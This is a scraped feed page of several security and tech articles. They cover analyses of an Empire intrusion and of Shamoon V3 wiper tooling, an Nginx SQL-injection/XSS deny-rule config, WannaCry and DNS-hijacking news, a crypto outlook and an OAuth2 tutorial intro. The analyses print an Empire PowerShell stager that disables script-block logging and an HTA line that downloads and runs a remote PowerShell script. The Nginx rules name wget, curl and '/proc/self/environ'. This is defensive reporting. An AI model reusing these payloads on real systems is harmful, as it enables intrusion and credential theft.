Quantcast
Channel: CodeSection,代码区,网络安全 - CodeSec
Viewing all 12749 articles
Browse latest View live

实际场景下如何在POC中检测Empire的攻击流量

$
0
0
直奔主题

近期,我们在对一份来自大型银行客户的PoC进行研究,研究了几天之后,我们在同一台设备上发现了多个安全威胁,其中包括渗透测试过程中常见的威胁。

比如说:

1.Eicar样本;

2.CQHashDumpv2(密码导出工具);

3.NetCat安装。

我们在询问客户之后,得知原来其中的部分事件是当时在得到授权的情况下所进行的渗透测试检查。

但随后,我们发现了一个针对Firefox的漏洞利用活动,整个攻击时间轴如下图所示:


实际场景下如何在POC中检测Empire的攻击流量

这张图足矣帮助我们了解设备上到底发生了什么。接下来,我们还发现了以下几个有意思的地方:

1.攻击是从一个通过Firefox浏览器下载的恶意Word文档开始的(很可能是某封邮件的),这个文档使用了宏功能来开启 PowerShell 控制台,然后运行Empire代码。

我们的客户端检测到的漏洞利用文件如下:


实际场景下如何在POC中检测Empire的攻击流量

根据VirusTotal的记录,我们检测到的这个漏洞利用文件是之前没出现过的。漏洞利用代码的首次上传时间为2018-10-24 09:17:01 UTC,就在客户设备打开该文件的两个小时之前。


实际场景下如何在POC中检测Empire的攻击流量
2.检测到该威胁之后,VT中的57个引擎只有12个(基于AI的引擎)能识别出这个恶意文档:
实际场景下如何在POC中检测Empire的攻击流量
3.PowerShell中加载了经过混淆处理的Base64代码:
实际场景下如何在POC中检测Empire的攻击流量

下面给出的是经过混淆处理后的代码:

-W 1-C[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('c3RvcC1wcm9jZXNzIC1uYW1lIHJlZ3N2cjMyIC1Gb3JjZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ=='))|iex;[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('SWYoJHtQYFNgVmVyc2BJb05UQWJsZX0uUFNWZXJzaW9OLk1hSk9yIC1nZSAzKXske2dgUGZ9PVtSRWZdLkFTU2VNYmx5LkdFVFRZUEUoKCdTeXN0ZW0uJysnTWFuYWdlJysnbWUnKydudCcrJy5BJysndXRvbWF0aW9uLlUnKyd0aWxzJykpLiJHZVRGSWVgTGQiKCgnY2FjaGVkRycrJ3JvJysndXAnKydQb2xpYycrJ3lTZXR0aW4nKydncycpLCdOJysoJ29uUHUnKydibGljLCcrJ1N0YXQnKydpYycpKTtJZigke2dgcEZ9KXske0dgUGN9PSR7R2BwZn0uR2V0VkFMVWUoJHtOdWBMbH0pO0lmKCR7Z2BwY31bKCdTJysnY3InKydpcHRCJykrKCdsbycrJ2NrTG8nKydnZ2knKyduZycpXSl7JHtHYFBDfVsoJ1NjcmlwdCcrJ0InKSsoJ2wnKydvY2tMb2dnaScrJ25nJyldWygnRW5hJysnYicrJ2xlJysnU2MnKydyaXB0QicpKygnbG8nKydja0wnKydvZ2cnKydpbmcnKV09MDske2dgUEN9WygnU2NyaScrJ3AnKyd0QicpKygnbG9jaycrJ0xvZ2dpJysnbicrJ2cnKV1bKCdFbmEnKydiJysnbGVTYycrJ3JpJysncHRCJysnbG9ja0ludm9jYXRpb25Mb2cnKydnaScrJ25nJyldPTB9JHtWYEFsfT1bQ29sbGVDdGlvTnMuR2VOZVJ

接下来,我们对Base64代码进行了恢复,整个过程分为两个阶段:

半混淆代码

If(${P`S`Vers`IoNTAble}.PSVersioN.MaJOr-ge3){${g`Pf}=[REf].ASSeMbly.GETTYPE(('System.'+'Manage'+'me'+'nt'+'.A'+'utomation.U'+'tils'))."GeTFIe`Ld"(('cachedG'+'ro'+'up'+'Polic'+'ySettin'+'gs'),'N'+('onPu'+'blic,'+'Stat'+'ic'));If(${g`pF}){${G`Pc}=${G`pf}.GetVALUe(${Nu`Ll});If(${g`pc}[('S'+'cr'+'iptB')+('lo'+'ckLo'+'ggi'+'ng')]){${G`PC}[('Script'+'B')+('l'+'ockLoggi'+'ng')][('Ena'+'b'+'le'+'Sc'+'riptB')+('lo'+'ckL'+'ogg'+'ing')]=0;${g`PC}[('Scri'+'p'+'tB')+('lock'+'Loggi'+'n'+'g')][('Ena'+'b'+'leSc'+'ri'+'ptB'+'lockInvocationLog'+'gi'+'ng')]=0}${V`Al}=[ColleCtioNs.GeNeR

去混淆代码

If(${PSVersIoNTAble}.PSVersioN.MaJOr-ge 3){${gPf}=[REf].ASSeMbly.GETTYPE(('System.Management.Automation.Utils'))."GeTFIeLd"(('cachedGroupPolicySe ttings'),'N'+('onPublic,Static'));If(${gpF}){${GPc}=${Gpf}.GetVALUe(${NuLl});If(${gpc}[('ScriptB')+('lockLogging')]){${G PC}[('ScriptB')+('lockLogging')][('EnableScriptB')+('lockLogging')]=0;${gPC}[('ScriptB')+('lockLogging')][('EnableScript BlockInvocationLogging')]=0}${V`Al}=[ColleCtioNs.GeNeR

原来,这是一段非常流行的Empire代码,GitHub上就有:【 传送门 】。

4.certutil进程加载了一份可疑文件: emp.txt hvKqcJJPFnm7.txt

大家也看到了,这个文件的文件名非常奇怪。作为一个txt文件,文件名里面还有一个.txt,因此它成功引起了我们的注意。


实际场景下如何在POC中检测Empire的攻击流量
5.我们还怀疑cmd加载了一个BAT文件:

代码中涉及到的文件名是很长的随机名称,而文件地址为\AppData\Roaming\目录。

总结

对于银行客户来说,这种类型的攻击有可能导致严重的后果,甚至会造成财产损失。因此,及时检测并分析PoC就显得至关重要了。在我们的这次分析中,我们成功从PoC中提取出了威胁标识,这样就可以帮助大家进一步提升终端保护解决方案的有效性了。

*参考来源: sentinelone ,FB小编Alpha_h4ck编译,转载请注明来自CodeSec.Net


Nginx 防止SQL注入、XSS攻击的实践配置方法

$
0
0

昨天临近下班的时候,明月发现博客( iMydl.com )访问缓慢,甚至出现504错误,通过 top -i 命令查看服务器负载发现负载数值飙升到3.2之多了,并且持续时间越来越频繁直至持续升高的趋势,还以为是被攻击了,对来访IP进行了阈值限制后效果并不是很明显,CDN服务里限制几个主要IP效果依然不是很明显,这时候明月意识到这是被恶意扫描攻击了应该。


Nginx 防止SQL注入、XSS攻击的实践配置方法

通过服务器waf的日志记录分析得出基本都是SQL注入、XSS攻击范畴,这些攻击都绕过了CDN缓存规则直接回源请求,这就造成phpmysql运算请求越来越多,服务器负载飙升就是这个原因造成的,在日志里可以看到几乎大部分都是 GET/POST 形式的请求,虽然waf都完美的识别和拦截了,但是因为 Nginx 层面应对措施,所以还是会对服务器负载形成一定的压力,于是在Nginx里也加入了防止SQL注入、XSS攻击的配置,没有想到效果竟然出奇的好。


Nginx 防止SQL注入、XSS攻击的实践配置方法
将下面的Nginx配置文件代码放入到对应站点的.conf配置文件[server]里,然后重启Nginx即可生效。 if ($request_method !~* GET|POST) { return 444; } #使用444错误代码可以更加减轻服务器负载压力。 #防止SQL注入 if ($query_string ~* (\$|'|--|[+|(%20)]union[+|(%20)]|[+|(%20)]insert[+|(%20)]|[+|(%20)]drop[+|(%20)]|[+|(%20)]truncate[+|(%20)]|[+|(%20)]update[+|(%20)]|[+|(%20)]from[+|(%20)]|[+|(%20)]grant[+|(%20)]|[+|(%20)]exec[+|(%20)]|[+|(%20)]where[+|(%20)]|[+|(%20)]select[+|(%20)]|[+|(%20)]and[+|(%20)]|[+|(%20)]or[+|(%20)]|[+|(%20)]count[+|(%20)]|[+|(%20)]exec[+|(%20)]|[+|(%20)]chr[+|(%20)]|[+|(%20)]mid[+|(%20)]|[+|(%20)]like[+|(%20)]|[+|(%20)]iframe[+|(%20)]|[\<|%3c]script[\>|%3e]|javascript|alert|webscan|dbappsecurity|style|confirm\(|innerhtml|innertext)(.*)$) { return 555; } if ($uri ~* (/~).*) { return 501; } if ($uri ~* (\\x.)) { return 501; } #防止SQL注入 if ($query_string ~* "[;'<>].*") { return 509; } if ($request_uri ~ " ") { return 509; } if ($request_uri ~ (\/\.+)) { return 509; } if ($request_uri ~ (\.+\/)) { return 509; } #if ($uri ~* (insert|select|delete|update|count|master|truncate|declare|exec|\*|\')(.*)$ ) { return 503; } #防止SQL注入 if ($request_uri ~* "(cost\()|(concat\()") { return 504; } if ($request_uri ~* "[+|(%20)]union[+|(%20)]") { return 504; } if ($request_uri ~* "[+|(%20)]and[+|(%20)]") { return 504; } if ($request_uri ~* "[+|(%20)]select[+|(%20)]") { return 504; } if ($request_uri ~* "[+|(%20)]or[+|(%20)]") { return 504; } if ($request_uri ~* "[+|(%20)]delete[+|(%20)]") { return 504; } if ($request_uri ~* "[+|(%20)]update[+|(%20)]") { return 504; } if ($request_uri ~* "[+|(%20)]insert[+|(%20)]") { return 504; } if ($query_string ~ "(<|%3C).*script.*(>|%3E)") { return 505; } if ($query_string ~ "GLOBALS(=|\[|\%[0-9A-Z]{0,2})") { return 505; } if ($query_string ~ "_REQUEST(=|\[|\%[0-9A-Z]{0,2})") { return 505; } if ($query_string ~ "proc/self/environ") { return 505; } if ($query_string ~ "mosConfig_[a-zA-Z_]{1,21}(=|\%3D)") { return 505; } if ($query_string ~ "base64_(en|de)code\(.*\)") { return 505; } if ($query_string ~ "[a-zA-Z0-9_]=http://") { return 506; } if ($query_string ~ "[a-zA-Z0-9_]=(\.\.//?)+") { return 506; } if ($query_string ~ "[a-zA-Z0-9_]=/([a-z0-9_.]//?)+") { return 506; } if ($query_string ~ "b(ultram|unicauca|valium|viagra|vicodin|xanax|ypxaieo)b") { return 507; } if ($query_string ~ "b(erections|hoodia|huronriveracres|impotence|levitra|libido)b") {return 507; } if ($query_string ~ "b(ambien|bluespill|cialis|cocaine|ejaculation|erectile)b") { return 507; } if ($query_string ~ "b(lipitor|phentermin|pro[sz]ac|sandyauer|tramadol|troyhamby)b") { return 507; } #这里大家根据自己情况添加删减上述判断参数,cURL、wget这类的屏蔽有点儿极端了,但要“宁可错杀一千,不可放过一个”。 if ($http_user_agent ~* YisouSpider|ApacheBench|WebBench|Jmeter|JoeDog|Havij|GetRight|TurnitinBot|GrabNet|masscan|mail2000|github|wget|curl|Java|python) { return 508; } #同上,大家根据自己站点实际情况来添加删减下面的屏蔽拦截参数。 if ($http_user_agent ~* "Go-Ahead-Got-It") { return 508; } if ($http_user_agent ~* "GetWeb!") { return 508; } if ($http_user_agent ~* "Go!Zilla") { return 508; } if ($http_user_agent ~* "Download Demon") { return 508; } if ($http_user_agent ~* "Indy Library") { return 508; } if ($http_user_agent ~* "libwww-perl") { return 508; } if ($http_user_agent ~* "Nmap Scripting Engine") { return 508; } if ($http_user_agent ~* "~17ce.com") { return 508; } if ($http_user_agent ~* "WebBench*") { return 508; } if ($http_user_agent ~* "spider") { return 508; } #这个会影响国内某些搜索引擎爬虫,比如:搜狗 #拦截各恶意请求的UA,可以通过分析站点日志文件或者waf日志作为参考配置。 if ($http_referer ~* 17ce.com) { return 509; } #拦截17ce.com站点测速节点的请求,所以明月一直都说这些测速网站的数据仅供参考不能当真的。 if ($http_referer ~* WebBench*") { return 509; } #拦截WebBench或者类似压力测试工具,其他工具只需要更换名称即可。
Nginx 防止SQL注入、XSS攻击的实践配置方法

经明月一夜测试和体验,上述代码运行很稳定,结合服务器上的防火墙规则以及waf的拦截和屏蔽,目前站点都已经恢复正常,服务器负载也是正常范围。上述配置代码系明月收集整理出来的,特意分享出来希望可以帮助到有需要的站长们!

大爆发18个月后 WannaCry病毒还出现在被感染电脑上

$
0
0

大爆发18个月后 WannaCry病毒还出现在被感染电脑上

腾讯科技讯 据外媒报道,在WannaCry勒索病毒大爆发18个月后,它仍然像幽灵般地时不时出现在数千(如果不是数十万的话)台被感染的电脑上。

当WannaCry病毒第一次大爆发时,Kryptos Logic公司的安全研究员马库斯-哈钦斯(Marcus Hutchins)注册了一个域名,找到了病毒攻击的“终止开关”(kill switch),从而成功阻止了WannaCry蔓延。如果该病毒连接到这个“终止开关”域名,那么该病毒的勒索组件就不会激活。不过,这种病毒将继续在后台悄无声息地运行,同时定期连接“终止开关”域名以检查它是否仍处于激活状态。

上周五,Kryptos Logic公司安全与威胁情报研究主管杰米-汉金斯(Jamie Hankins)在微博网站Twitter上发布了一条推文,公布了有关“终止开关”域名的连接次数和IP地址。尽管“终止开关”现在由Cloudflare托管,但是汉金斯称,他们仍然可以访问有关该域名的统计信息。

根据汉金斯发布的数据显示,WannaCry“终止开关”域名在一周内接收到1700多万次连接。这些连接来自194个不同国家/地区的63万多个IP地址。

下面的图表显示了受WannaCry感染仍然最严重的一些国家,其中中国、印度尼西亚和越南位列前三名。汉金斯称,根据一天的统计数据显示,英国的连接次数约占总连接次数的0.15%,而美国的连接次数占总连接次数的1.35%。


大爆发18个月后 WannaCry病毒还出现在被感染电脑上
图2:一周内不同国家感染WannaCry的IP地址

汉金斯还发布了一张图表,显示了每周的连接次数。正如人们预期的那样,随着更多的用户进入办公室并打开电脑,正常工作日的连接数量比周末要多。


大爆发18个月后 WannaCry病毒还出现在被感染电脑上
图3:一周内的连接次数

事实上,现在仍然有如此多的计算机感染这种恶意病毒,这确实是一个大问题。

为了防止这种情况发生,汉金斯建议使用公司客户他们的TellTale服务来查找并确保它们的IP地址没有被WannaCry病毒感染。

2018年4月,Kryptos Logic公司发布了一项名为TellTale的服务,它允许任何组织监控其IP地址是否感染病毒。如果一个组织的计算机感染了WannaCry勒索病毒以及Kryptos Logic公司监控的其他已知病毒,那么TellTale服务发现后就会立即通知该组织。

由于仍有大量组织受到WannCry和其他隐形恶意病毒的影响,TellTale成了一种有用的工具,可以在组织受到感染时及时发出警告。(腾讯科技审校/乐学)

疑似伊朗黑客组织APT33再出手,利用Shamoon V3发起新一波攻击

$
0
0

疑似伊朗黑客组织APT33再出手,利用Shamoon V3发起新一波攻击

在上周,McAfee高级威胁研究小组发布了一篇分析文章。在这篇文章中,该研究小组分析了针对中东和欧洲企业的新一波Shamoon“wiper(磁盘擦除恶意软件)”攻击活动,并讨论了最新Shamoon攻击活动与此前Shamoon攻击活动的区别。其中最值得关注的是,最新版本的Shamoon(Shamoon V3)作为一个wiper模块,也作为一种独立的恶意软件被使用。

基于对Shamoon V3的分析以及其他一些线索,,该研究小组得出了这样一个结论,这些攻击背后的幕后黑手很可能是伊朗黑客组织APT33,或一个试图伪装成APT33的黑客组织。

在2016到2017年期间的Shamoon攻击活动中,攻击者同时使用了Shamoon V2和另一种wiper――Stonedrill。而在2018年的攻击活动中,该研究小组观察到了Shamoon V3和另一款最初由赛门铁克提到的wiper――Filerase。

该研究小组的分析表明,最新版本的Shamoon似乎只是一个包含多个模块的.Net工具包的一部分。具体来说,该研究小组确认了以下模块:

OCLC.exe:用于读取攻击者创建的目标计算机列表,并负责运行第二个工具spreader.exe。 Spreader.exe:用于向目标计算机传播wiper。另外,它也被用于获取有关操作系统版本的信息。 SpreaderPsexec.exe:与spreader.exe类似,但它使用的是psexec.exe来远程执行wiper。 SlHost.exe:wiper模块,遍历系统并擦除每一个目标文件。

这也反映出,至少有多名开发人员参与了为最新一波攻击准备恶意软件的工作。该研究小组曾在上一篇文章中指出,Shamoon V3作为.Net工具包中的一个wiper模块,它也可作为一种独立的恶意软件供其他攻击组织使用。从最近的这些攻击来看,这种假设似乎得到了证实。该研究小组还了解到,攻击者在数个月前就已经启动了新活动的前期准备工作,目标旨在通过wiper的执行来破坏目标系统。

这篇文章提供了有关新一波Shamoon攻击的更多见解,以及对.Net工具包的详细分析。

地缘政治背景

与此前一样,攻击的动机尚不明确。因为,Shamoon V1攻击的是位于中东的两个目标,Shamoon V2攻击的是位于沙特阿拉伯的多个目标,而Shamoon V3利用欧洲的供应商对中东企业发起了供应链攻击。

在这个.Net工具包中,该研究小组发现了如下ASCII图案:


疑似伊朗黑客组织APT33再出手,利用Shamoon V3发起新一波攻击
这些字符组成了一个类似于阿拉伯文“ ”的图案。这是古兰经(Surah Masad, Ayat 1 [111:1])中的一句话,意思是“愿火焰之父的双手毁灭吧!他已经毁灭。” 攻击流程
疑似伊朗黑客组织APT33再出手,利用Shamoon V3发起新一波攻击
恶意软件是如何进入受害者的网络的?

该研究小组的分析表明,攻击者在前期准备阶段创建了一些与某些合法域名(提供就业机会的网站)非常相似的网站。例如:

Hxxp://possibletarget.ddns.com:880/JobOffering

由该研究小组发现的许多URL都与主要在中东运营的能源企业有关,其中一些网站还包含有执行其他payload的恶意HTML应用程序文件,其余网站则旨在诱使受害者使用自己的凭证进行登录。根据McAfee的遥测数据,这些攻击似乎是从2018年8月底开始的,而目的就是收集这些凭证。

以下是一个恶意HTML应用程序文件的代码示例:

YjDrMeQhBOsJZ = “WS” wcpRKUHoZNcZpzPzhnJw = “crip” RulsTzxTrzYD = “t.Sh” MPETWYrrRvxsCx = “ell” PCaETQQJwQXVJ = (YjDrMeQhBOsJZ + wcpRKUHoZNcZpzPzhnJw + RulsTzxTrzYD + MPETWYrrRvxsCx) OoOVRmsXUQhNqZJTPOlkymqzsA=new ActiveXObject(PCaETQQJwQXVJ) ULRXZmHsCORQNoLHPxW = “cm” zhKokjoiBdFhTLiGUQD = “d.e” KoORGlpnUicmMHtWdpkRwmXeQN = “xe” KoORGlpnUicmMHtWdp = “.” KoORGlicmMHtWdp = “(‘http://mynetwork.ddns.net:880/*****.ps1’) OoOVRmsXUQhNqZJTPOlkymqzsA.run(‘%windir%\\System32\\’ + FKeRGlzVvDMH + ‘ /c powershell -w 1 IEX (New-Object Net.WebClient)’+KoORGlpnUicmMHtWdp+’downloadstring’+KoORGlicmMHtWdp) OoOVRmsXUQhNqZJTPOlkymqzsA.run(‘%windir%\\System32\\’ + FKeRGlzVvDMH + ‘ /c powershell -window hidden -enc

上面这个脚本被用于在受害者的计算机上打开一个命令shell,并从外部下载一个PowerShell脚本。对PowerShell脚本的分析表明,它被用于收集用户名、密码和域名等信息。以下是PowerShell脚本的部分代码:

function primer { if ($env:username -eq “$($env:computername)$”){$u=”NT AUTHORITY\SYSTEM”}else{$u=$env:username} $o=”$env:userdomain\$u $env:computername $env:PROCESSOR_ARCHITECTURE

通过收集到的凭证,攻击者能够登录到目标网络中,并传播wiper。

.Net工具包

如上所述,新一波Shamoon攻击是通过一个.Net工具包进行的,旨在传播ShamoonV3和Filerase。


疑似伊朗黑客组织APT33再出手,利用Shamoon V3发起新一波攻击

第一个模块(OCLC.exe)被用于读取存储在两个本地目录(“shutter”和“light”)中的两个文本文件,它们包含有目标计算机列表。


疑似伊朗黑客组织APT33再出手,利用Shamoon V3发起新一波攻击

另外,OCLC.exe也被用于启动一个新的隐藏命令窗口进程来运行第二个模块Spreader.exe,该模块被用于使用上述两个文本文件作为参数,以传播ShamoonV3和Filerase。


疑似伊朗黑客组织APT33再出手,利用Shamoon V3发起新一波攻击
疑似伊朗黑客组织APT33再出手,利用Shamoon V3发起新一波攻击

首先,Spreader.exe模块会使用上述包含目标计算机列表和windows版本的两个文本文件作为参数,以检查目标计算机的Windows版本。


疑似伊朗黑客组织APT33再出手,利用Shamoon V3发起新一波攻击

然后,将可执行文件(Shamoon和Filerase)放入文件夹“Net2”中。


疑似伊朗黑客组织APT33再出手,利用Shamoon V3发起新一波攻击

另外,它还会在远程计算机上创建一个文件夹:C:\\Windows\System32\Program Files\Internet Explorer\Signing。


疑似伊朗黑客组织APT33再出手,利用Shamoon V3发起新一波攻击

然后,将上述可执行文件复制到该文件夹中。


疑似伊朗黑客组织APT33再出手,利用Shamoon V3发起新一波攻击

接下来,它会创建一个批处理文件“\\RemoteMachine\admin$\\process.bat”来运行远程计算机上的可执行文件。需要注意的是,这个批处理文件包含了可执行文件的路径。然后,它会设置运行批处理文件的权限。

如果上述过程失败,Spreader.exe模块还会创建一个名为“NotFound.txt”的文本文件,其中包含目标计算机名称和操作系统版本。攻击者可以通过它来追踪传播过程中出现的问题。

以下展示的是上述过程所涉及到的一些函数:


疑似伊朗黑客组织APT33再出手,利用Shamoon V3发起新一波攻击

如果在文件夹“Net2”中不存在可执行文件,Spreader.exe模块则会检查文件夹“all”和“Net4”。


疑似伊朗黑客组织APT33再出手,利用Shamoon V3发起新一波攻击

为了传播wiper,攻击者还使用了另一个模块SpreaderPsexec.exe。需要说明的是,Psexec.exe是微软PSTools工具中的一种用于远程执行命令的管理工具。


疑似伊朗黑客组织APT33再出手,利用Shamoon V3发起新一波攻击

这里的区别在于,SpreaderPsexec.exe使用的Psexec.exe存储在文件夹“Net2”中。这意味着它也可以在其他计算机上使用,以进一步传播wiper。


疑似伊朗黑客组织APT33再出手,利用Shamoon V3发起新一波攻击
疑似伊朗黑客组织APT33再出手,利用Shamoon V3发起新一波攻击

wiper包含三个选项:

SilentMode:在没有任何输出的情况下运行wiper。 BypassAcl:提升权限。值得注意的是,它始终是开启的。 PrintStackTrace:追踪已擦除的文件夹和文件的数量。
疑似伊朗黑客组织APT33再出手,利用Shamoon V3发起新一波攻击

如上所述,BypassAcl始终是开启的(始终为“true” )。它为wiper提供了以下权限:

SeBackupPrivilege SeRestorePrivilege SeTakeOwnershipPrivilege SeSecurityPrivilege
疑似伊朗黑客组织APT33再出手,利用Shamoon V3发起新一波攻击

为了找到目标文件,wiper使用了GetFullPath函数来获取路径。


疑似伊朗黑客组织APT33再出手,利用Shamoon V3发起新一波攻击

它会擦除找到的每一个目标文件夹和文件。


疑似伊朗黑客组织APT33再出手,利用Shamoon V3发起新一波攻击

正如文章一开头所说的那样,它能够遍历系统每一个文件夹中的每一个文件。


疑似伊朗黑客组织APT33再出手,利用Shamoon V3发起新一波攻击

对于要擦除的文件和文件夹,wiper首先会移除它们的“只读”属性。


疑似伊朗黑客组织APT33再出手,利用Shamoon V3发起新一波攻击

接下来,它会将每个文件的创建、修改及访问时间都更改为3000年1月1日 12:01:01。


疑似伊朗黑客组织APT33再出手,利用Shamoon V3发起新一波攻击

然后,它会使用随机字符串对每个文件进行两次重写。


疑似伊朗黑客组织APT33再出手,利用Shamoon V3发起新一波攻击

它首先会使用带有ACCESS_MASK DELETE flag的API CreateFile擦除文件。

然后,使用FILE_DISPOSITION_INFORMATION擦除文件。


疑似伊朗黑客组织APT33再出手,利用Shamoon V3发起新一波攻击

ProcessTracker函数则被用来追踪擦除的情况。


疑似伊朗黑客组织APT33再出手,利用Shamoon V3发起新一波攻击
总结

McAfee高级威胁研究小组表示,在2017年的Shamoon攻击浪潮中,他们观察到了两种wiper。在2018年12月的攻击中,他们观察到了类似的特征。采用“工具包”的形式,攻击者可以通过受害者的网络来传播wiper模块。工具包是采用.Net编写的,且没有经过混淆处理。这与作为wiper模块的Shamoon V3不同,它的代码是经过加密处理的,作为一种逃避安全检测的手段。

很难确定这些攻击的动机,因为McAfee高级威胁研究小组还没有找到足够的线索。但他们表示,确实在Shamoon V3中看到了出现在Shamoon V2中的技术。另外,政治声明似乎已经成为Shamoon攻击的一部分。在V1中,攻击者使用了一张正在燃烧的美国国旗的图片。在V2中,攻击者使用了一张溺亡的叙利亚男孩的图片(附带有也门阿拉伯语的文字),似乎暗指叙利亚和也门的冲突。现在,我们在V3中看到了一段摘自《古兰经》的句子,可能预示着攻击的动机与另一场中东冲突有关。

通过对比在这些攻击中使用的TTP(战术、技术和流程),以及域名和工具(如FireEye在其报告中所描述的),McAfee高级威胁研究小组得出结论,这些攻击背后的幕后黑手很可能是伊朗黑客组织APT33,或一个试图伪装成APT33的黑客组织。

IOC

散列值:

OCLC.exe: d9e52663715902e9ec51a7dd2fea5241c9714976e9541c02df66d1a42a3a7d2a Spreader.exe: 35ceb84403efa728950d2cc8acb571c61d3a90decaf8b1f2979eaf13811c146b SpreaderPsexec.exe: 2ABC567B505D0678954603DCB13C438B8F44092CFE3F15713148CA459D41C63F Slhost.exe: 5203628a89e0a7d9f27757b347118250f5aa6d0685d156e375b6945c8c05eb8a

文件路径和文件名:

C:\net2\ C:\all\ C:\net4\ C:\windows\system32\ C:\\Windows\System32\Program Files\Internet Explorer\Signing \\admin$\process.bat NothingFound.txt MaintenaceSrv32.exe MaintenaceSrv64.exe SlHost.exe OCLC.exe Spreader.exe SpreaderPsexec.exe 命令行

终于对顽疾下手了 以后劫持DNS将判刑

$
0
0

DNS(Domain Name System)劫持又称域名劫持,是指对正常的域名解析请求加以拦截,转而反馈给用户一个假的IP地址或令请求失去响应,导致打开的任意网址指向定制的钓鱼网站或是恶意网站,进而获取用户个人信息的网络攻击行为。而这一网络危害目前正呈现出扩展与蔓延的迹象,成为当前企业移动应用运营上的一大毒瘤。


终于对顽疾下手了 以后劫持DNS将判刑

根据最高人民法院12月25日发布一批依法严惩网络犯罪指导性案例,其中包括三个破坏计算机信息系统罪的案例。其中,付宣豪、黄子超“DNS劫持”案,则是我国第一起因为“流量劫持”而被判刑的案件。

以往诸如“DNS劫持”这样的“流量劫持”案件大多以不正当竞争案处理,且此后的类似刑事案件往往不同法院判处不同罪名。但此次最高法发布指导性案例,可谓对“流量劫持”刑案定罪一锤定音。

此外,最高法还通过两件案例,延展了对何为“计算机信息系统”的解释,将基于物联网技术的机械远程监控系统、空气采样器纳入其中,更利于维护企业财产权益和环保力度。

查看原文

文章纠错

微信公众号搜索"驱动之家"加关注,每日最新的手机、电脑、汽车、智能硬件信息可以让你一手全掌握。推荐关注!【微信扫描下图可直接关注


终于对顽疾下手了 以后劫持DNS将判刑

How 2019 will Change Cryptocurrency?

$
0
0

2018 oversaw some major changes in the crypto world. We hope 2019 will be no different; it's just that the changes will only lead to a positive outcome. Last year, there were many developments in the blockchain realm with people saying that Bitcoin Mining is no longer profitable.

Considering that, and after doing our research, following we are going to share some impending developments we will like to see this New Year:

New Crypto Currencies

The introduction of a new cryptocurrency is quickly noted into Branding Company Directory around the world. Tether bid its farewell to the world when it lost over 10% of its value within a week. But the positive development is it leads to more stable coins. These coins make crypto-lending promising as they cut-price volatility with minor fluctuations.

This change has made it was to get a crypto-backed loan. So yes, we believe cryptocurrency, and blockchain will get more stable throughout 2019.

Better Security

Blockchains helps to make transactions secure and prevent frauds. This is leading to the inception of new applications. But security does remain a primary concern, especially when it comes to the crypto economy. Security translates to stability in the financial marketplace. Companies are using decentralized biometric authentication to cut the chances of a data breach.

Mashable’s Stan Schroeder perfectly encapsulated the insecurities people had with Bitcoin in his article, How 2018 Changed Bitcoin ? Security has remained a leading concern in cryptocurrency, but there have been some major improvements in the past.

STOs instead of ICOs

This could be the biggest blockchain development of 2019. There is a rumor out there that ICOs are dead, but more than $11 billions are raised in investment. So, we have time, ICOs are nearing their even thanks to no regulations and low success rate. Business has stopped running pre-ICO sales in crypto financing.

The process just got shorter, and people are selling tokens for cheap. This may lead to the rise of Security Token Offerings. They make securities on Blockchain transparent and transferable. STOs will replace ICOs as they are safe and ensure the investors are protected.

STO will help make excellent investment plans; they offer fixed and flexible returns, it depends on the company’s revenue and getting non-proprietary rights. Anyone suggesting their company should invest in STO crypto will benefit from it.

The Rules will be Strict

Forbes did an excellent review of David Clarke’s Behind the Cloud Ep.6 where he discussed Blockchain and Self-Sovereign Identity. David discusses how cloud and blockchain security can be and will be improved shortly.

More rules are going to be introduced in the Crypto Space, and we are fine by it. It just makes the market stable and safe for us. The issue is, companies want to see whether Fundraising should be done with STOs or ICOs.

Some crypto platforms are not licensed and left unchecked. This makes it hard for companies who want to target more companies with better inquiries and enjoy better compliance from their existing players, especially the one that wants to start a business.

The market wants to become regulated by itself before any government body takes over them. There is an idea that industry-wide associate forums up with crypto-backed loan companies to help protect consumers with legal compliance.

Customers will be Empowered

Custody Solutions and Insurance are becoming a standard in the Crypto world. It’s imperative that you have clear regulations because they help to protect your blockchain assets. They help build trust and attract investors. It's important that you offer your investors a chance to trade in crypto without the risk of theft. This is why most crypto exchanges feature custody offerings. This helps custody solutions become mainstream and affordable.

Mainstream Adoption

Since the introduction of Bitcoins and Blockchain Tech, everyone is talking about their mainstream adoption. When will be the time when investors will able to bet against Bitcoin to settle their contracts in real money? When will someone trade-off Bitcoin when they don’t even own it?

Cryptocurrency did hit the mainstream road. We will soon see cryptocurrency backed loans. These loans will be fast and help everyone to make a profit in exchange for their coin. In short, cryptocurrency is becoming a well-recognized commodity.

Spring Boot Security Oauth2 With Angular

$
0
0

In this article, we will be creating a sample spring boot application with REST APIs exposed. These REST APIs will be secured with OAUTH2 protocol with JWT as a TokenStore. In the client side, we will be creating an angular 7 based application to consume the REST APIs. Hence, the angular application will first get the OAUTH2 authorization token from an AuthorizationServer and then consume the REST APIs to perform CRUD operation on a User entity. Here we will be using a mysql database to read user credentials instead of in-memory authentication.

In short, we will be creating a full stack app using Spring Boot OAUTH2 and Angular 7.Though the client is built is using Angular 7, the same is valid with other Angular versions such as Angular 5 and Angular 6. In my previous articles, we have already created multiple spring boot applications using OAUTH2. Hence, we will be re-using some of the components from it. You can visit this for all the list on spring security applications that we have built earlier. Also, you can visit thisangular 7 CRUD app to get started with Angular 7 app.

Spring security OAUTH2 provides default token store but the implementation also provides functionality to define custom token store. Here, we will be using JwtTokenStore. Using JwtTokenStore as token provider allows us to customize the token generated with TokenEnhancer to add additional claims.

What is OAuth2

OAuth 2 is an authorization framework that enables applications to obtain limited access to user accounts on an HTTP service, such as Facebook, GitHub, and DigitalOcean. It works by delegating user authentication to the service that hosts the user account, and authorizing third-party applications to access the user account. OAuth 2 provides authorization flows for web and desktop applications, and mobile devices.

OAuth2 Roles

OAuth2 provides 4 different roles.

Resource Owner: User

Client: Application

Resource Server: API

Authorization Server: API

OAuth2 Grant Types

Following are the 4 different grant types defined by OAuth2

Authorization Code: used with server-side Applications

Implicit: used with Mobile Apps or Web Applications (applications that run on the user's device)

Resource Owner Password Credentials: used with trusted Applications, such as those owned by the service itself

Client Credentials: used with Applications API access

Spring Boot OAUTH2 Project Structure
Spring Boot Security Oauth2 With Angular
OAuth2 Authorization Server Config

